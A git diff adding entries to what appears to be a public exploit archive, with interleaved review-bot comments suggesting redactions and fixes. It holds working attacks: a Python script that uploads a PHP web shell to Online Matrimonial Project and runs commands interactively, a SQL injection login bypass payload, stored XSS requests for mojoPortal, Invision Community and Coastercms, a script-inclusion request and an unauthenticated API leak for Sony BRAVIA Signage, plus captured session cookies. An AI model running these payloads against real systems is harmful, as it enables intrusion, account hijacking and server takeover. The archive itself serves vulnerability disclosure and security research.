diff --git a/exploits/hardware/webapps/49186.txt b/exploits/hardware/webapps/49186.txt
new file mode 100644
index 000000000..651176bdb
--- /dev/null
+++ b/exploits/hardware/webapps/49186.txt
@@ -0,0 +1,69 @@ +# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion +# Date: 20.09.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://pro-bravia.sony.net +# Version: 1.7.8 + +Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion + + +Vendor: Sony Electronics Inc. +Product web page: https://pro-bravia.sony.net + https://pro-bravia.sony.net/resources/software/bravia-signage/ + https://pro.sony/ue_US/products/display-software +Affected version: <=1.7.8 + +Summary: Sony's BRAVIA Signage is an application to deliver +video and still images to Pro BRAVIAs and manage the information +via a network. Features include management of displays, power +schedule management, content playlists, scheduled delivery +management, content interrupt, and more. This cost-effective +digital signage management solution is ideal for presenting +attractive, informative visual content in retail spaces and +hotel reception areas, visitor attractions, educational and +corporate environments. + +Desc: BRAVIA digital signage is vulnerable to a remote file +inclusion (RFI) vulnerability by including arbitrary client-side +dynamic scripts (JavaScript, VBScript, HTML) when adding content +though the input URL material of type html. This allows hijacking +the current session of the user, execute cross-site scripting code +or changing the look of the page and content modification on current +display. 
+ +Tested on: Microsoft Windows Server 2012 R2 + Ubuntu + NodeJS + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5612 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php + + +20.09.2020 + +-- + + +Request: +-------- + +POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1 +Host: 192.168.1.20:8080 +Proxy-Connection: keep-alive +Content-Length: 468 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Origin: http://192.168.1.20:8080 +Referer: http://192.168.1.20:8080/test.txt +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: io=RslVZVH6Dc8WsOn5AAAJ + +{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}} \ No newline at end of file diff --git a/exploits/hardware/webapps/49187.txt b/exploits/hardware/webapps/49187.txt new file mode 100644 index 000000000..91cb0f96b --- /dev/null +++ b/exploits/hardware/webapps/49187.txt 
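Review bot: The captured request in the 49186.txt hunk keeps what looks like a live session cookie, `Cookie: io=RslVZVH6Dc8WsOn5AAAJ`, and the 49184.txt hunk likewise leaves the `.mojochangeme=` and `localhostportalroles25=` authentication tickets in full while redacting only `ASP.NET_SessionId=[removed]`; the 49188.txt hunk shows the cleaner convention (`Cookie: XYZ`), so both should be redacted the same way before this lands. The title and the Desc paragraph also disagree on classification: "Remote File Inclusion" normally denotes server-side inclusion, but what is shown is a client-side script reference placed in a `material` entry of type `html`, i.e. stored cross-site scripting, and naming it that way would help readers triage it. A remediation line would round the entry out, e.g. `Fix: validate the material URL against an allow-list of trusted origins and require an authenticated session on /api/content-creation`.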
@@ -0,0 +1,52 @@ +# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure +# Date: 20.09.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://pro-bravia.sony.net +# Version: 1.7.8 + +Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure + + +Vendor: Sony Electronics Inc. +Product web page: https://pro-bravia.sony.net + https://pro-bravia.sony.net/resources/software/bravia-signage/ + https://pro.sony/ue_US/products/display-software +Affected version: <=1.7.8 + +Summary: Sony's BRAVIA Signage is an application to deliver +video and still images to Pro BRAVIAs and manage the information +via a network. Features include management of displays, power +schedule management, content playlists, scheduled delivery +management, content interrupt, and more. This cost-effective +digital signage management solution is ideal for presenting +attractive, informative visual content in retail spaces and +hotel reception areas, visitor attractions, educational and +corporate environments. + +Desc: The application is vulnerable to sensitive information +disclosure vulnerability. An unauthenticated attacker can +visit several API endpoints and disclose information running +on the device. 
+ +Tested on: Microsoft Windows Server 2012 R2 + Ubuntu + NodeJS + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5610 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php + + +20.09.2020 + +-- + + +$ curl http://192.168.1.20:8080/api/system + +{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"} \ No newline at end of file diff --git a/exploits/multiple/webapps/49182.txt b/exploits/multiple/webapps/49182.txt new file mode 100644 index 000000000..c82f2cb0b --- /dev/null +++ b/exploits/multiple/webapps/49182.txt @@ -0,0 +1,20 @@ +# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass +# Date: 02-12-2020 +# Exploit Author: Mayur Parmar(th3cyb3rc0p) +# Vendor Homepage: http://egavilanmedia.com +# Software Link : http://egavilanmedia.com/egm-address-book/ +# Version: 1.0 +# Tested on: PopOS + +Attack Vector: +An attacker can gain admin panel access using malicious sql injection queries. + +Steps to reproduce: +1. Open admin login page using following URl: +-> http://localhost/Address%20Book/login.php + +2. Now put below Payload in both the fields( User ID & Password) +Payload: admin' or '1'='1 + +3. Server accepted our payload and we bypassed cpanel without any +credentials \ No newline at end of file diff --git a/exploits/multiple/webapps/49184.txt b/exploits/multiple/webapps/49184.txt new file mode 100644 index 000000000..4ec2ea96b --- /dev/null +++ b/exploits/multiple/webapps/49184.txt 
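Review bot: The Desc paragraph in the 49187.txt hunk says an unauthenticated attacker can visit "several API endpoints", but the hunk demonstrates only `GET /api/system`; the claim should be narrowed to what is shown or the text should state that the others were confirmed. The sample response deserves one sentence of context for defenders: beyond the version string it exposes interface addresses and the content server location (`contentsServer.url`, `hostIp`), which is what makes this more than a version leak. A fix hint such as `Fix: require an authenticated session on all /api/ routes` would make the entry actionable.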
@@ -0,0 +1,42 @@ +# Exploit Title: mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting +# Date: 3-12-2020 +# Exploit Author: Sagar Banwa +# Vendor Homepage: https://mojoportal.com +# Software Link: https://www.mojoportal.com/download +# Version: 2.7.0.0 +# Tested on: Windows 10/Kali Linux + +Attack vector: +This vulnerability can results attacker to inject the XSS payload in Add Forum title section and each time admin visits the View Detail of Forum section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. + +Vulnerable Parameters: Edit Forum 'Title :'. + +Steps-To-Reproduce: +1. Login to the Admin Account +2. Go to the Forums. +3. click on Add Forum. +4. Add payload to Title: +5. Click on Create New Forum. +6. As soon as admin or any visitor visit the forum the XSS payload will triage. + + +Post Request - +''' + +POST /Forums/EditForum.aspx?mid=1275&pageid=756 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://localhost/Forums/EditForum.aspx?mid=1275&pageid=756 +Content-Type: application/x-www-form-urlencoded +Content-Length: 5037 +Origin: https://localhost +Connection: close +Cookie: ASP.NET_SessionId=[removed]; _ga=GA1.2.1772464100.1606932969; _gid=GA1.2.1379348562.1606932969; returnurl25=https://localhost/; .mojochangeme=7ECC859CF4455C5CAE01964464A1029D676213BFF565B38E31D6AE3CF45C212B26FEF4451D2565510EFC1FBEE1A0002322CB05C272CFF74A5F2BDD798286542EA2BC30A889ABDC6D74502865A66DECF250F715A55C510F2DFDBCA1865D3DF436DA579221; 
localhostportalroles25=3119B16DC158DE7032105189AE61DB79F7043A498D422DABE9485B15E18E299E5C3B1C0696B736560172F2435276EF79EBF5D93A714F285B6EAEB16B648CB2EA4C7AE691B25D00EF4AD168393EFB423ED302A355C340B5D11AA9C7F44BDA6767678C3212BAA3B2991B38D1971836A62C0A1E2EF7AA36FE5DFE1BDAFF077F785F74B360520BA5793271671755790ED2BB9E98199A; fwAdminDrawer=close; _gat=1 +Upgrade-Insecure-Requests: 1 + +__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATEFIELDCOUNT=7&__VIEWSTATE=8GbpJWPoYrikzpEsM5g5Oyxg%2Fw3otQN%2Bp%2FxL2%2BIM8Cb0gFtj%2BUt4LWZm2SnDpq2wFeoZ5CxcLmEwnfTYfX3zUCO8ullGYZmsvrRPgkCmd4Q8Ziuu9bC6xpnpvd3zY2u2%2FmkVsmTINB4RJfAFk%2FM2RGngO7YcBtMIdKm1B0Mca3Lzwk9SbGZ%2BrkzOKF%2FMw%2Fev0rDciq1cZ2EfgKa6cfHhN9Rdo1CK3u%2FaGhGTXDMq4kgcV8VmtKYzMd60hoYTtdj%2B6xVyW2kJ0W6uYuzNZy4ctGRethu2TDkK%2Bp3Jt69X2iL07JQmXYFL4Nouh%2FF5nR3dDnhT50x%2F7ezT%2BRKLpwnBPrqE2XRgsR9eCwyV59d6NIxNos6fD3rYmhRgONXeinpuRxe8AFElCPOnFXJz7nhtBNkUx9xl2jx95l6CS7wE8wQtFQc5PWUlJ7r1junVJ5oUmFhLEjDXn7qJ%2Fn9kBHDzTjYI7Epq%2Fo8uS9FRO0PeNyQLqUlRW5Ig&__VIEWSTATE1=xhUOYE%2FB05kVdGbeLy9qSX0k5X6mJ0pwbklHcDgNHAdlV6yKobnEZLVzA11ZLSVTDLlg1anxthz4S3MKQLjEcxWd8EbQ6TFFyuR4Ey6ZQlHXc4YXVzaRdBe8XPsfbZrh6fqBJab90XjGQZoAMeE3mDqXVKo7oeA5YpZn4bfBHNxj8el8vs%2B5QbAD5INtXMzVMLrtoNxHRlPjtn7u2LiRHXS7mal7GPJ2RD48rh1sEBkohr91gAxGBLdl3H3rT%2Fo1ACtQU8sNRceeV1XhgEbjPyweu6L2FPtyWxyQXma76osWfXkftyt3dloWIywM201r3ByGOAxR%2BtpFpj3IwIoyEJvvUnJ3UcteS6DiG2QqebBaVAl%2B4NzTAhMOg3%2FX%2Fa5%2BZC8lZ71yf8U5GF58DcCEI36PvnQOlKlKuO2CsO0iOTXf8UYirVNV%2F6qqgwru0P5HhCulGGM%2BTrUswOWEZYkMzoyjeRwt54PUOKaAllJrYBy4UwYjs7Ma&__VIEWSTATE2=ME%2FnWlF9Jj7LFvrQ3J6B24%2FZAdATYRBm7MuM%2FZQ%2B2ft4PF%2BONy1JWKH%2F46T%2BS9ni%2FjOnj8TN9ACNlJlfGkhfmhXBCBaLpf5o2h58ucOACihtCaSmjixiv%2B1SM7DKYp3l3SRp0DrHZWLy9bHZIV1qFNOyudHvIMHy8mYC5dlH5vvFVcDC%2BZeAbCbOeYVBLlnKXatlNf3x91urPZhemx35uzEied9Tk7w8W3o5W5W5a9vWLrBkEg4Mhm5IHx0qTn9LHLP5dNi6EQnM%2B%2FE1%2FRcJoZq1%2BkjhBOPGx1M7EVg%2BnXzJLy1%2BnXEf5D64P6pS8HdNtxQOtLgP4RC9YFWzkMhRI%2B9B71cPQfRHKAJCB3idIBtvQ7OhmArPbsq0pOvmfOF7c3dsy0NyY8KtVTlGaL1km5H1Q2SZdn1yMmnaeGlOgoioPM7f
SZ8u%2BE%2BtQkvuPY5afsnt1H%2BUmGBGbiZZZR1%2BR%2FkvUANhzOHnLfuXcloItlRnvpKF0gIW&__VIEWSTATE3=VG3JlCj%2FguoAhsgsZxvtFo51ac%2FZob3zGU3iuvj56w2XljOxYhJ25EqC%2BaJjbgyCCSgF%2FIUQ8XIdHtIOBKvDhyv%2BWhlPdttXTOzBKk9EW6swSmZN9TNVL32jDq5suMPMrh9SsNj7b62O0ycjpCeVPRGfCThjWYxu0GwFiy%2Fnd65fr6BUCiaoTliKw%2Bvnh3IMw0CQSu5VdL0Y4h2R5hiomNKkcfqjFN%2BXtj9UrXNqOS13QZ9TP1NLf0Q2CXQ%2FjZvwSM9koJlEZ3Z2xfvOo4VXU92ONV%2FuBg3ugFTpw9NcEVnU5C5HDDQdQJpYqrUpRpIOaDru80pqBz90shkebGCRnbbeSAaZb%2FpcBsSNnmpftBSftR0nZYMX3VAAJaxjyehbtfLsmbHPuCdzyLOsqMPaFClG00yAR%2BbmuKIv2veSZ6GBGQjM14jrRoWgqZmF711tfCIfEDYErBz5%2BGC%2F4xz8gv44z%2BSF8VKk4s5dOCKZo1YZQ7yFqSYD&__VIEWSTATE4=z%2FvLRzX2nqqUfDd9UEeZG%2Bowmey7SmdvonndNsjZWX35cB4FiARHvWJhnHIoJEY2%2BJB6bFM8628%2B35cnidhq5iboc6dhqAo%2Fl9VbFfp4rxq%2BGh%2Bw%2Fu%2BNiyai3o6LWuy5cWxRnAMrlNhErHm86uVj1HTosQbBDhd0PU7yVTS2dEtfi3GggBfVDFn2eLh4sr6iSkN85RPhENouvNKl6PmHhhaFl4poe6etmjh63vYipPoY1VvYz2h%2BDisT5lEo7NYOhchYv%2FIQPuGkPBjkdTqtqourBuYw0pzLGRA1zf8X0UgwWnJVT8RLaf3Bp0uatXoatA%2FIo5j1Lggxm9cM2GFH7%2FrYDwAyPgWF%2BtLgqQUpnZoQoeIh62uPykr3p5pKsWXpKdtz4IINfyH%2BE0CH2gj96zVM76zFHdYt59%2Bs%2BZgu5i%2Bzf3icKJWlZaJiLzfEpSwIQijjvzC5CxwEAoO1LfnupW%2FZFWt%2FwsDXOZl2tgAunHfXe4sv4YHu&__VIEWSTATE5=8E0NZMBOC6vc%2Fm%2F%2FPv1X3U9D8PHM%2F60zTW2Fgz%2FDdau3xuxrxCd6EkTpHliKnJld0hjuEnMan6KZGs3sy59qTLc%2FOAU5Y%2Bg4FtWPugB%2B8faI4wtWGpLlR%2F2%2FhVyIer702HqYaZe2YtmG3FzYsEP5iNdWBIVAHG%2B285uMPcrARf7t7RNbnVLYe2hR4g6rm%2B3cz7Xlvl0hW1gtdYBLtD4x8eGpNWXsrZEdc9jjsRgDfd12VsDVZeIYxA5llNAQYyLLcv1czlYtLC2rT2cay3LZ3bCz5KvNOiNQNc4PjL5bXBFGlz9BCztmCHaxWXkhytsFQJOND2HqK6ZcBSsXFur9XKjdhkVbLJUGY6hd9zlqurehbzaS9qJFe2g1DTCuJeN39qqcjJk3ev3TOQbu9Q2RX2VEFF8Mdd8WFRdaJ7JJN5kzkmVgtcjmrhHZjpsZEGVYmL0A3HbXukjVBb8kHoOA1MzUagoa6kwmCNfNCmGgbKKZVSm90HF5&__VIEWSTATE6=O%2BS12LR2Z4oVhKLtpr07dZf4n4xaCnf%2BvWZpBROiixTdpBGO4Eg3J%2B2UqaWIrBm2FJjY%2B2NAG6EiGHDpYEzCuBEHQQg3RzT0co%2F0MXY0Vp%2FvhG5voMgkx24Zixl3Z2RcJ7GFNDyF2hDwZmEhmR8d5Xeh%2FlkLsGc4vHL7SAXLwg5lSPgLb8wTEPDv2WkOChlXK%2BKAUm5v6N4o3dv9j9fztlHsS%2FFXHM1HvYfH%2BX5UPFAfvCkiiK6iXbrQsvVR
VX9KBvWmMdBLC4FHSX8BO6qy2U8d2TaJIG2YfewgUHkGWMEvhqFqsTyetatA&__VIEWSTATEGENERATOR=28F0A2BA&__EVENTVALIDATION=MhCP0%2FosgOAGG9hof6m2uvCclDI3J3ur9418exWCyHZn20PSWqlYEBB584LM%2Fwt7LEIk5phX%2F%2FnqL9ZAiCGAwuqvm%2FS9%2FjvzaXlbQf9H0qlhD30h7hKVA1zy%2FQB1rQh8Nbmh3tjczNLrHj%2BY%2FlybGM%2BEyN%2BelhoN8Q%2FOykCziCKgbY9tDeDf4S%2FWsjzOoEGyOpijMEyEq0ikBrY26gO4X0GeiV6Yw6LvTHt5PL%2FNElgUT%2BCw%2B0loxrz5QgIKuKqozFkU08iSXgsVrNJKUFD%2FJaUPeaDRiNUjYsMQq5qXop%2F1%2B3lUT1XDP1MelFUveIeo4AxsnA%2FhoiB48O69ScQY0J6WTvQo%2B%2FpY6Cn4Din2x5QvSigzwCJtqI3F%2BSWxlZzYSeJCq1uQlw2lboNaJhOoDSDTUG3cO3Oy18WG6PHcKbZHgq%2BPDJq6RvXq50a9Z36J4lnFpQmRofOaSpXR7e0uoBo6VYatMOcu3uWC6WKq6%2F8I0G88OKDIXdU8mQyTr%2B4IfZ2tAwNkfhQQyOOPOQKjJOPGOYnH14ozP58d7PNrMbUQKCwyimsUbox5uLQclzM5wK4x1mV9FqA9PZOy1Q9ApKyLotkAJbTdVmBkDQ1ZKOUd9GOBgg%2BAOuVokVGF8qCF4NYZjBZjpfW0OmihSu%2BXiONqPoa6K5483r8tF0%2F5Hch2K4XggkPqA%2B%2FVmfHr%2BkwKb7RUbQ%3D%3D&ctl00%24mainContent%24txtTitle=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ctl00%24mainContent%24edContentinnerEditor=&ctl00%24mainContent%24txtSortOrder=100&ctl00%24mainContent%24txtPostsPerPage=10&ctl00%24mainContent%24txtThreadsPerPage=40&ctl00%24mainContent%24allowedPostRoles%24ctl00%242=Authenticated+Users&ctl00%24mainContent%24txtModeratorNotifyEmail=&ctl00%24mainContent%24chkIncludeInGoogleMap=on&ctl00%24mainContent%24btnUpdate=Create+New+Forum&ctl00%24mainContent%24hdnReturnUrl=https%3A%2F%2Flocalhost%2Fforums + +''' \ No newline at end of file diff --git a/exploits/multiple/webapps/49188.txt b/exploits/multiple/webapps/49188.txt new file mode 100644 index 000000000..198aa9c9d --- /dev/null +++ b/exploits/multiple/webapps/49188.txt 
@@ -0,0 +1,39 @@ +# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting +# Date: 02-12-2020 +# Exploit Author: Hemant Patidar (HemantSolo) +# Vendor Homepage: https://invisioncommunity.com/ +# Software Link: https://invisioncommunity.com/buy +# Version: 4.5.4 +# Tested on: Windows 10/Kali Linux + +Vulnerable Parameters: Profile - Field Name. + +Steps-To-Reproduce: +1. Go to the Invision Community admin page. +2. Now go to the Members - MEMBER SETTINGS - Profiles. +3. Now click on Add Profile field. +4. Put the below payload in Field Name: +"" +5. Now click on Save button. +6. The XSS will be triggered. + + +POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1 +Host: 127.0.0.1 +Connection: close +Content-Length: 660 +Accept: */* +DNT: 1 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: https://127.0.0.1 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles +Accept-Encoding: gzip, deflate +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 +Cookie: XYZ + 
+form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom= \ No newline at end of file diff --git a/exploits/php/webapps/49137.txt b/exploits/php/webapps/49137.txt index 1fa8e7bcd..94857d566 100644 --- a/exploits/php/webapps/49137.txt +++ b/exploits/php/webapps/49137.txt @@ -5,6 +5,7 @@ # Software Link: https://lepton-cms.org/english/download/archive.php # Version: 4.7.0 # Tested on: Windows 10/Kali Linux +# CVE: CVE-2020-29240 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. diff --git a/exploits/php/webapps/49181.txt b/exploits/php/webapps/49181.txt new file mode 100644 index 000000000..70d02200e --- /dev/null +++ b/exploits/php/webapps/49181.txt 
@@ -0,0 +1,23 @@ +# Exploit Title: Coastercms 5.8.18 - Stored XSS +# Exploit Author: Hardik Solanki +# Vendor Homepage: https://www.coastercms.org/ +# Software Link: https://www.coastercms.org/ +# Version: 5.8.18 +# Tested on Windows 10 + +XSS IMPACT: +1: Steal the cookie +2: User redirection to a malicious website + +Vulnerable Parameters: Edit Page tab + +Steps to reproduce: +1: Navigate to "http://localhost/admin/login" and log in with +admin credentials. +2:- Then after login navigates to "Page --> Homepage --> Our Blog" and +click on the edit page. +3: Then add the payload "" & Payload +"

test

", and cliock on update button. Saved succesfully. +4: Now, click on "View live page" and it will redirect you to the live page +at "http://localhost/homepage/blog" and XSS will get stored and +trigger on the main home page \ No newline at end of file diff --git a/exploits/php/webapps/49183.py b/exploits/php/webapps/49183.py new file mode 100755 index 000000000..f2b082ac6 --- /dev/null +++ b/exploits/php/webapps/49183.py 
@@ -0,0 +1,94 @@ +# Exploit Title: Online Matrimonial Project 1.0 - Authenticated Remote Code Execution +# Exploit Author: Valerio Alessandroni +# Date: 2020-10-07 +# Vendor Homepage: https://projectworlds.in/ +# Software Link: https://projectworlds.in/free-projects/php-projects/online-matrimonial-project-in-php/ +# Source Link: https://github.com/projectworldsofficial/online-matrimonial-project-in-php +# Version: 1.0 +# Tested On: Server Linux Ubuntu 18.04, Apache2 +# Version: Python 2.x +# Impact: Code Execution +# Affected components: Affected move_uploaded_file() function in functions.php file. +# Software: Marital - Online Matrimonial Project In PHP version 1.0 suffers from a File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file. +# Attack vector: An authenticated (you can register a user for free) not privileged user is able to upload arbitrary file in the upload form used to send profile pics, if the file is a PHP script, it can be executed. 
+# +# Additional information: +# +# To exploit this vulnerability: +# 1) register a not privileged user at /register.php +# 2) login in the application /login.php +# 3) keep note of the redirect with the GET 'id' parameter /userhome.php?id=[ID] +# 4) go to the page /photouploader.php?id=[ID] +# 5) upload an arbitrary file in the upload form, in my example, I used a file called shell.php with the content of "" +# 6) An error will occurr, but the file is correctly uploaded at /profile/[ID]/shell.php +# 7) run command system command through /profile/[ID]/shell.php?cmd=[COMMAND] +# +# How to use it: +# python exploit.py [URL] [USERNAME] [PASSWORD] + + +import requests, sys, urllib, re, time +from colorama import Fore, Back, Style +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) + +def webshell(SERVER_URL, ID, FILE_NAME): + try: + print(Fore.YELLOW+'[+] '+Fore.RESET+'Connecting to webshell...') + time.sleep(1) + WEB_SHELL = SERVER_URL+'profile/'+ID+'/'+FILE_NAME + getCMD = {'cmd': 'echo ciao'} + r2 = requests.get(WEB_SHELL, params=getCMD) + status = r2.status_code + if status != 200: + print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) + r2.raise_for_status() + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') + while True: + + inputCMD = raw_input('$ ') + command = {'cmd': inputCMD} + r2 = requests.get(WEB_SHELL, params=command, verify=False) + print r2.text + except: + print("\r\nExiting.") + sys.exit(-1) + +def printHeader(): + print(Fore.GREEN+"___ ___ _ _ _ "+Fore.RED+" ______ _____ _____") + print(Fore.GREEN+"| \/ | (_)| | | |"+Fore.RED+" | ___ \/ __ \| ___|") + print(Fore.GREEN+"| . . 
| __ _ _ __ _ | |_ __ _ | |"+Fore.RED+" | |_/ /| / \/| |__ ") + print(Fore.GREEN+"| |\/| | / _` || '__|| || __|/ _` || |"+Fore.RED+" | / | | | __| ") + print(Fore.GREEN+"| | | || (_| || | | || |_| (_| || |"+Fore.RED+" | |\ \ | \__/\| |___ ") + print(Fore.GREEN+"\_| |_/ \__,_||_| |_| \__|\__,_||_|"+Fore.RED+" \_| \_| \____/\____/ ") + print '' + + + +if __name__ == "__main__": + printHeader() + if len(sys.argv) != 4: + print (Fore.YELLOW+'[+] '+Fore.RESET+"Usage:\t python %s [URL] [USERNAME] [PASSWORD]" % sys.argv[0]) + print (Fore.YELLOW+'[+] '+Fore.RESET+"Example:\t python %s https://192.168.1.1:443/marital/ Thomas password1234" % sys.argv[0]) + sys.exit(-1) + SERVER_URL = sys.argv[1] + SERVER_URI = SERVER_URL + 'auth/auth.php' + LOGIN_PARAMS = {'user': '1'} + LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} + req = requests.post(SERVER_URI, params=LOGIN_PARAMS, data=LOGIN_DATA, verify=False) + print(Fore.YELLOW+'[+] '+Fore.RESET+'logging...') + time.sleep(1) + for resp in req.history: + COOKIES = resp.cookies.get_dict() + SPLITTED = resp.headers["location"].split("=") + ID = SPLITTED[1] + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully retrieved user [ID].') + time.sleep(1) + SERVER_URI = SERVER_URL + 'photouploader.php' + LOGIN_PARAMS = {'id': ID} + LOGIN_DATA = {'username': sys.argv[2], 'password': sys.argv[3], 'op': 'Log in'} + FILE_NAME = 'shell.php' + FILES = {'pic1': (FILE_NAME, ''), 'pic2': ('', ''), 'pic3': ('', ''), 'pic4': ('', '')} + req = requests.post(SERVER_URI, params=LOGIN_PARAMS, files=FILES, cookies=COOKIES, verify=False) + print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully uploaded.') + time.sleep(1) + webshell(SERVER_URL, ID, FILE_NAME) \ No newline at end of file diff --git a/exploits/windows/remote/43936.py b/exploits/windows/remote/43936.py index 0c9757302..972cee8c0 100755 --- a/exploits/windows/remote/43936.py +++ b/exploits/windows/remote/43936.py 
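Review bot: The header in the 49183.py hunk names the affected component (`# Affected components: Affected move_uploaded_file() function in functions.php file.`) but never says what closes the hole, so a reader triaging the entry has nothing to act on; suggest adding a line after it such as `# Remediation: allow-list upload extensions/MIME types server-side and store profile uploads where PHP execution is disabled`. As a point of style, the bare `except:` in `webshell` collapses every failure (connection refused, the `raise_for_status()` HTTPError, even KeyboardInterrupt) into the same "Exiting." message, so the cause is lost; `except Exception as e:` with `e` printed would keep the diagnostic. The script is Python 2 only (`print` statements, `raw_input`), which the `# Version: Python 2.x` header does state, but saying so in the usage line too would save readers a failed run.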
@@ -72,7 +72,7 @@ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
- print "[*] Testing connection to tatget %s:%s" %(host,port)
+ print "[*] Testing connection to target %s:%s" %(host,port)
 s.connect((host, port))
 except:
diff --git a/files_exploits.csv b/files_exploits.csv
index 14491d65f..3e318052e 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43369,7 +43369,8 @@ id,file,description,date,author,type,platform,port
 49136,exploits/php/webapps/49136.txt,"Tailor Management System 1.0 - Unrestricted File Upload to Remote Code Execution",2020-12-01,"Saeed Bala Ahmed",webapps,php,
 49137,exploits/php/webapps/49137.txt,"LEPTON CMS 4.7.0 - 'URL' Persistent Cross-Site Scripting",2020-12-01,"Sagar Banwa",webapps,php,
 49138,exploits/php/webapps/49138.txt,"Medical Center Portal Management System 1.0 - 'login' SQL Injection",2020-12-01,"Aydın Baran Ertemir",webapps,php,
-49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities # Date: 11-14-2020",2020-12-01,"Matthew Aberegg",webapps,php,
+49139,exploits/php/webapps/49139.txt,"Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2020-12-01,"Matthew Aberegg",webapps,php,
+49183,exploits/php/webapps/49183.py,"Online Matrimonial Project 1.0 - Authenticated Remote Code Execution",2020-12-03,"Valerio Alessandroni",webapps,php,
 49140,exploits/php/webapps/49140.txt,"Social Networking Site - Authentication Bypass (SQli)",2020-12-01,gh1mau,webapps,php,
 49145,exploits/multiple/webapps/49145.txt,"Tendenci 12.3.1 - CSV/ Formula Injection",2020-12-01,"Mufaddal Masalawala",webapps,multiple,
 49146,exploits/multiple/webapps/49146.txt,"Expense Management System - 'description' Stored Cross Site Scripting",2020-12-02,"Nikhil Kumar",webapps,multiple,
